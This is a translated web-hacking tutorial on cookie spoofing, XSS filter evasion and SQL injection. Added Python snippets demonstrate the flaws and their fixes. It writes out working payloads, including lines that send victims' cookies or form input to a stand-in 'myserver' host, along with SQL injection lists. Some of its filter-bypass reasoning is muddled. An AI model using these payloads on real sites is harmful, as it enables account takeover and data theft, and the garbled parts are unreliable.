XSS & SQL Injection

Source: Internet
Author: User

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more    X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Author: CyberPhreak
Translation: Ghost [S.S.T]

~ Introduction

In this article I will explain what I know about XSS and more. Through this document I hope you will understand what XSS is, why XSS is used and how to use it. Once you have learned that, you will need to use your creativity, because most people have fixed the simple XSS vulnerabilities. What they forget is that there is more to fix than a single XSS string, and they rely on PHP's built-in security functions to defend against XSS instead of thinking for themselves. At the same time I will not only cover XSS but web security more broadly.

XXXXXXXXXXXXXXXXXXXXX
X Table of Contents X
XXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing   X
X XSS              X
X SQL Injection    X
XXXXXXXXXXXXXXXXXXXX

~ What is a cookie?

A cookie is a small piece of data. Once you browse to a site and register an account, a cookie is set to record who you are. In the simplest design the cookie saves your login information so the site can check whether you have logged in before; if you have not, it checks your username and password and then logs you in. It is like a nightclub: when you buy a ticket they give you a card, so you can go in and out without buying a ticket every time. Cookies are more complex than that, though: a nightclub only remembers you for one night, while a cookie can remember you for years. Keep in mind that the cookie is stored in the browser, that is, on the client, and anything that lives there can be read and changed by the user.

~ Warning & Spoofing

Now you know what cookies are... what can you do with them? Cookie editing (modification) is one of the simplest techniques: all you need is a browser and some basic JavaScript. Open your browser, log in to a website and enter this in the address bar:

javascript:alert(document.cookie)

You will now see your cookie; on a badly designed site it contains your username and sometimes even your password. Most websites, however, use sessions instead of storing credentials in the cookie: the cookie then only holds a session identifier and the session data itself lives on the server, where you cannot modify it. A cookie that stores the identity directly is different: once you change it, you can pretend to be someone else. (Modern browsers make this harder: cookies flagged HttpOnly are not visible to document.cookie, and pasting a javascript: URL into the address bar is usually blocked, so use the storage panel of the developer tools instead.) Now let's start spoofing. Suppose the alert box shows something like this:

strusername=cnsst; strpassword=cnsst

Assume you know that 'bitch' is an administrator, but you don't know the password. Because the site trusts the username in the cookie, you don't need one:

javascript:void(document.cookie="strusername=bitch")

Now enter javascript:alert(document.cookie) again and you will see the changed value. That is about all there is to cookie modification...
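As an added example (not part of the original article), here is the server side of the cookie trick above, written in Python to stand in for the site's PHP. The first function believes the strusername cookie the way the vulnerable site does; the other two show the fix the text alludes to when it says sessions cannot be modified by the client: a cookie whose username is bound to an HMAC computed with a key only the server knows, so an edited cookie fails verification. The cookie names, the key and the session token format are assumptions for the example.

```python
import hmac
import hashlib


def parse_cookie_header(header):
    """Split a raw Cookie header ("a=1; b=2") into a dict, as a server would."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def identify_vulnerable(cookie_header):
    """The design the text attacks: the server believes whatever username the
    cookie claims, so editing strusername in the browser edits your identity."""
    return parse_cookie_header(cookie_header).get("strusername")


def issue_session_cookie(username, key):
    """Hypothetical hardened design: the cookie carries the username plus an
    HMAC-SHA256 tag over it, computed with a key only the server knows."""
    tag = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return "session=%s.%s" % (username, tag)


def identify_signed(cookie_header, key):
    """Accept the username only if its tag verifies. A client can change the
    username, but cannot recompute the tag without the server key."""
    token = parse_cookie_header(cookie_header).get("session", "")
    username, sep, tag = token.rpartition(".")
    if not sep or not username:
        return None
    expected = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison so a wrong tag leaks nothing through timing
    if not hmac.compare_digest(tag, expected):
        return None
    return username


if __name__ == "__main__":
    key = b"server-only-secret (assumed for the example)"
    # Constructed cookies: the legitimate user from the text, then an edited one
    print(identify_vulnerable("strusername=cnsst; strpassword=cnsst"))  # cnsst
    print(identify_vulnerable("strusername=admin"))                     # admin, no password needed
    good = issue_session_cookie("cnsst", key)
    forged = good.replace("session=cnsst.", "session=admin.")
    print(identify_signed(good, key))    # cnsst
    print(identify_signed(forged, key))  # None
```

The point of the signed variant is not secrecy (the username is still readable in the cookie) but integrity: the server no longer has to trust the client's copy of who it is. Setting the cookie with HttpOnly and Secure is a separate, complementary defence.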

~ What is XSS?

XSS, or CSS as some still call it (the name XSS avoids confusion with Cascading Style Sheets), stands for cross-site scripting. Basically you inject a script into a page in whatever way you can, so that it does what you want. Through XSS you can also intercept what users enter, such as usernames, passwords and cookies. We will discuss this in detail with many examples; this article should help you develop your creativity with XSS.

~ Why XSS

Obviously you can execute any script you like in the victim's browser through XSS; the server only stores or reflects the script, the browser runs it. But XSS is not limited to running scripts of your own, it can also intercept input. Take this field: <input name="name" type="text">
With XSS you capture what is typed into it and send it to your own site through a hidden request. That is not all XSS can do: it can also steal cookies, and cookies hold valuable information such as session identifiers and, on badly designed sites, usernames and passwords.

~ Let's get started...

I assume you know HTML and JavaScript; PHP knowledge is helpful but not necessary. Let's start with this PHP script.

XSS - Cross-Site Scripting
<html>
<body>
<form action="" method="GET">
<!-- I use the GET method because it is easier to experiment with. -->
Script: <input name="name" type="text">
<input type="submit" value="submit">
</form>
</body>
</html>

<?php
// The parameter is echoed into the page exactly as received: this is the
// vulnerability the rest of the section exploits.
$name = $_GET['name'];
echo("Hello $name");
?>

OK, we should all know what the code above does... it is a very silly script, and nobody would use it on a real site (at least I have never seen it), but it is really useful for beginners to understand the principle. Let's look at what happens with my input:

cnsst
"Hello cnsst"

The text in quotation marks is the output. Now enter:
<script>alert(document.cookie)</script>

It pops up document.cookie! So the page is vulnerable to XSS.

Now that we have a little understanding of XSS, let's look closer. First, the script takes your input and pastes it into the page. In other words, we can input any data. Any data... so which languages does that give us, on the client and on the server? Client-side languages are interpreted by your browser: JavaScript, HTML, VBScript and so on.

Server-side languages run on the other side, not in your browser but on the server: PHP, ASP and so on.

There are ways to inject PHP as well, which I will explain later. Now, how does this help us? Injecting JavaScript is simple. Suppose you are writing a website: because it is your site, you can use any JavaScript (JS) you want. With XSS anyone else can too, because XSS lets you make the website run any script you want.

Let's look at a slightly more complex example!

Suppose you enter <script>alert(document.cookie)</script> and the echo is:
scriptalert(document.cookie)/script
or perhaps:
scriptalertdocument.cookie/script

As you can see, this is harder to exploit... but there are many ways to exploit XSS, and this is only one of them; it is also one of the weakest defences. Every "<" and ">" (and in the second case the parentheses and the dot as well) has been replaced with the empty string "".

Now think about what the filter actually matches. It may strip every occurrence of "<" and ">", or only the literal string "<script>", and it may or may not care about case. So if one spelling of
<script>alert(document.cookie)</script>
is not executed, a different spelling of the same payload may be. If you see
scriptalertdocument.cookie/script
or your tag echoed back intact but not executing, they may have replaced the pair in one place only, or deleted some of the letters. Try a variation of your own... you enter:
<script>alert(document.cookie)</script>

and the output is:
srplert(document.cookie)srp

Look carefully: nothing inside document.cookie was touched. Why? Because they do not know what you want to alert or what you want to do; they only guessed at the "<>" and the letters of the tag and function names, and deleted each of them once. How do we get past that? Look at this:
<sccriiptt>aalert(document.cookie)<//sccriiptt>

Every character the filter deletes has been doubled, so one copy of each survives: only the redundant characters are removed and the original payload is left behind! Now let's get a bit more advanced.

This time they use replacement too, but they check the whole string! For example, you enter:
<script>alert(document.cookie)</script>

and the output is:
scriptalert(document.cookie)script

Excited, you say "I know what to do!" and rebuild the payload the way you just learned. Output: scriptalert(document.cookie)script, the same as before. At this point you might keep adding more "<>" pairs, but they replace every "<>", no matter how many... Did you notice I said "anything"? Try the following:

<
script
>
alert
(
document
.
cookie
)
<
/
script
>

Look at it: this time the filter does not replace "<>" as such, it replaces the code keywords. So even a payload written without "<>" would still be caught, which is why we write it like this, one token per line, so the keywords never appear whole on a single line. If the other side uses even stricter rules and replaces any kind of code, even "alert"!, how can we improve on it? Look at this:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
>

This should be fine, but if they still replace "<", you can add two more "<>" pairs (and you can replace document.cookie with anything else you want to run).

A word of caution before you rely on this: breaking the payload across lines only defeats the filter, it does not help the browser. HTML treats "<" as the start of a tag only when a letter follows it immediately, so "<" on a line of its own followed by "script" on the next line is plain text, and JavaScript will not join "a l e r t" split across lines back into the identifier alert. Line breaks after a tag name (<script on one line and > on the next) and between JavaScript tokens (alert, a newline, then "(") are fine. So in the one-token-per-line version the tag name has to stay attached to its "<" for the browser to see a tag, and the one-character-per-line version only executes if the application removes the line breaks after filtering.

There are more examples I could show, but what I am teaching you is to use your creativity.
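As an added example, not code from the article, the Python below stands in for the PHP echo and for the two kinds of filter described in this section: one that deletes "<" and ">", and a keyword filter in the style of str_replace('<script>', '', $input) that is case sensitive and runs a single pass. Alongside the page's own payload it uses the standard variants for those filter classes, a differently cased tag and a nested one, and it ends with the real fix, output encoding equivalent to htmlspecialchars. opens_script_tag is a deliberately crude stand-in for the browser's tag-open rule and an assumption of the example, not a parser.

```python
import html
import re

# The page's own payload, reflected by echo("Hello $name")
PAYLOAD = "<script>alert(document.cookie)</script>"


def render_vulnerable(name):
    """Mirror of the PHP script: untrusted input pasted straight into HTML."""
    return "Hello " + name


def filter_strip_angles(text):
    """Weak filter from the text: delete every '<' and '>'."""
    return text.replace("<", "").replace(">", "")


def filter_strip_script_tag_once(text):
    """Keyword filter in the style of str_replace('<script>', '', $s):
    exact case and a single pass, so it neither loops nor folds case."""
    return text.replace("<script>", "").replace("</script>", "")


def render_safe(name):
    """Output encoding, the equivalent of htmlspecialchars($name, ENT_QUOTES):
    the browser displays the payload as text instead of parsing a tag."""
    return "Hello " + html.escape(name, quote=True)


def opens_script_tag(markup):
    """Crude model of the HTML tokenizer's tag-open rule (an assumption of
    this example): '<' begins a tag only when a letter follows it immediately,
    and the name ends at whitespace, '/' or '>'. Hence '<script\\n>' opens a
    script tag while '<\\nscript' is plain text."""
    return re.search(r"<script(?=[\s/>])", markup, re.I) is not None


# Standard variants for the two filter classes above (constructed here)
CASE_VARIANT = "<SCRIPT>alert(document.cookie)</SCRIPT>"
NESTED_VARIANT = "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>"


def survives(filter_fn, payload):
    """Does the payload still open a script tag after passing through filter_fn?"""
    return opens_script_tag(render_vulnerable(filter_fn(payload)))


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))                    # tag reaches the browser intact
    print(filter_strip_angles(PAYLOAD))                  # scriptalert(document.cookie)/script
    print(filter_strip_script_tag_once(CASE_VARIANT))    # untouched: wrong case for the filter
    print(filter_strip_script_tag_once(NESTED_VARIANT))  # the filter reassembles <script> itself
    print(render_safe(PAYLOAD))                          # &lt;script&gt;... shown as text
```

The nested variant is the instructive one: the filter's own deletion produces the tag it was supposed to remove, which is why blacklisting strings on input is a losing game and encoding on output is the fix.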

Now let me talk about other XSS methods. So far we have discussed client-side XSS, where the script travels in the request and is echoed straight back (usually called reflected XSS). Now let's look at server-side XSS, where the script is saved on the server and served to everyone who views the page (stored XSS).

First, the difference between the two. Client-side XSS is displayed by the interpreted languages of your browser, such as JavaScript (JS) and VBScript (VBS). Server-side XSS is stored by the server-side language, such as PHP or ASP; the script still runs in the browser of whoever views the page, but now it lives on the server.

We have learned how to construct client-side XSS; for the server-side kind we must get our script saved on the server. To do this we need a script that is vulnerable to XSS like any other, but one that stores our input. If you can publish an article on a website, what you do is replace the article with your XSS. Why use JavaScript rather than PHP? I will come back to that, but let me show you something first:
document.forms[0].action="http://myserver/myscript.php"
This works whether the XSS is stored or reflected; it does not matter. It points the form the users fill in at your server, where your script copies what they entered and saves it to a .txt file.

Suppose you have registered an account on the website and can customize your profile...
document.images[0].src="http://myserver/cookie.php?c="+encodeURIComponent(document.cookie)
Or, if you have a place to store a link to custom content, you can enter:
javascript:location.href="http://myserver/cookie.php?c="+encodeURIComponent(document.cookie)
This captures the cookie of every user who views our profile. It can be used anywhere, not just on profile data; this is only an example.

Sometimes a site displays your User-Agent and Referer... so let's try some XSS from the DOS prompt or a terminal. The request is typed by hand, so the headers carry whatever we like:

telnet example.com 80
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
Host: example.com
User-Agent: <script>alert(document.cookie)</script>
Referer: <script>alert(document.cookie)</script>

(finish with an empty line to send the request)

~ What is SQL injection?

SQL injection is one of the biggest security issues on websites. So what is it? Simply put, it is injecting SQL of your own into the queries a site builds from your input. Let's explore the different levels of SQL vulnerability. Suppose you have a login page like this:

<html>
<body>
<form action="" method="POST">
Username: <input name="name" type="text">
Password: <input name="password" type="password">
<input type="submit" value="Submit">
</form>
</body>
</html>

There is an XSS vulnerability here too, but you don't need to worry about it. There is no way to guess or crack the password. So what should we do? SQL injection!

The simplest test is to enter a single quote, ', as both the username and the password. If there is no protection mechanism you should get a database error. If you get one, the site is very likely vulnerable. The error message by itself is worthless unless you know how to use it, so here is a list of injections you can try once the single quote has produced an error:

'='
' OR 1=1 --
' OR a= --
' OR '

Since people have tightened security, these injections rarely work any more, but the following list is overlooked by many people on the security mailing lists:

' OR ''='
' OR "="
' OR '="
' OR "='
' OR '=''
' OR "=''
' OR ''="

~
Now let me explain UNION ALL SELECT. A UNION appends the rows of a second SELECT to the rows of the query the site already runs; what you get to see depends on the columns you select, and the second SELECT must return the same number of columns as the first or the database rejects the whole query.
UNION ALL SELECT username, password FROM users

If this query executes, good.... What if it does not? Try closing the original WHERE clause as well:
UNION ALL SELECT username, password FROM users WHERE username = ' OR "='
AND password = ' OR "='

You can substitute other characters for ' OR "=' to fit the injection point you have found. But first, how do you know the table name? Often the SQL error you provoked already contains it, together with a fragment of the query.

Once you have found the vulnerability, inject in the same style as ' OR "=' to learn the table name. Sometimes you want some useful data from a table but do not know which table it is in, so you have to go through all of them. In the following example there are 20 tables with different names and you are after a list of IP addresses; the ip column is selected twice so the number of columns matches the original query:
UNION ALL SELECT
ip, ip FROM logs
WHERE ip = ' OR ''="

Do you see this now? (I'm sure you have seen it before)
http://example.com/index.php?article=34
This displays the article with id 34... Let's replace the 34:
http://example.com/index.php?article='

Now remember what I said: most people are not aware of the damage a ' can do. You can always try different injections. Here are some examples (the browser percent-encodes the spaces and quotes, and the server decodes them before building the query):
http://example.com/index.php?article='
http://example.com/index.php?article=' OR 1=1 --
http://example.com/index.php?article=' OR a= --
http://example.com/index.php?article=' OR '="
http://example.com/index.php?article=' OR "='
http://example.com/index.php?article=' OR ''='
http://example.com/index.php?article=' OR '=''
http://example.com/index.php?article=' OR "'='
http://example.com/index.php?article=' OR "''='

Make full use of your creativity!
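The SQL side of this section, as an added example rather than the article's code, using Python's sqlite3 module in place of the site's PHP and database. make_db creates a constructed users, articles and logs schema (an assumption for the example). login_vulnerable and article_vulnerable build their queries by string concatenation like the text's login page and index.php?article=...; article_probe returns the database error the way a page that echoes exceptions leaks it to the attacker, which is also where the column-count rule for UNION ALL shows up; login_safe is the parameterised fix.

```python
import sqlite3


def make_db():
    """Constructed sample schema standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'n0t-gu3ssable'), ('cnsst', 'cnsst');
        CREATE TABLE articles (id TEXT, title TEXT);
        INSERT INTO articles VALUES ('34', 'Welcome'), ('35', 'News');
        CREATE TABLE logs (ip TEXT, page TEXT);
        INSERT INTO logs VALUES ('192.0.2.10', '/index.php'),
                               ('198.51.100.7', '/login.php');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The text's login page with the query built by string concatenation:
    a quote in the input closes the literal and the rest becomes SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately, so
    ' OR ''=' is just an odd username that matches nobody."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def article_vulnerable(conn, article):
    """index.php?article=... with the value concatenated into the query."""
    sql = "SELECT id, title FROM articles WHERE id = '%s'" % article
    return list(conn.execute(sql))


def article_probe(conn, article):
    """Run the article query and return ('rows', ...) or ('error', message),
    the way a page that echoes exceptions leaks them to the attacker."""
    try:
        return ("rows", article_vulnerable(conn, article))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    taut = "' OR ''='"
    print(login_vulnerable(db, taut, taut))          # ['admin', 'cnsst']: every row matches
    print(login_vulnerable(db, "' OR 1=1 --", "x"))  # ['admin', 'cnsst']: -- comments out the password check
    print(login_safe(db, taut, taut))                # []
    print(article_probe(db, "34'"))                  # ('error', ...): the single-quote test
    print(article_probe(db, "34' UNION ALL SELECT username FROM users --"))            # ('error', ...): column count mismatch
    print(article_probe(db, "34' UNION ALL SELECT username, password FROM users --"))  # the users table appended
    print(article_probe(db, "34' UNION ALL SELECT ip, ip FROM logs --"))               # ip repeated to match two columns
```

Note how the tautology works through operator precedence: username = '' OR ''='' AND password = '' OR ''='' is read as username='' OR (''='' AND password='') OR ''='', and the last term is always true. The parameterised version never lets the input reach the parser as SQL, so no list of quote variants matters.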
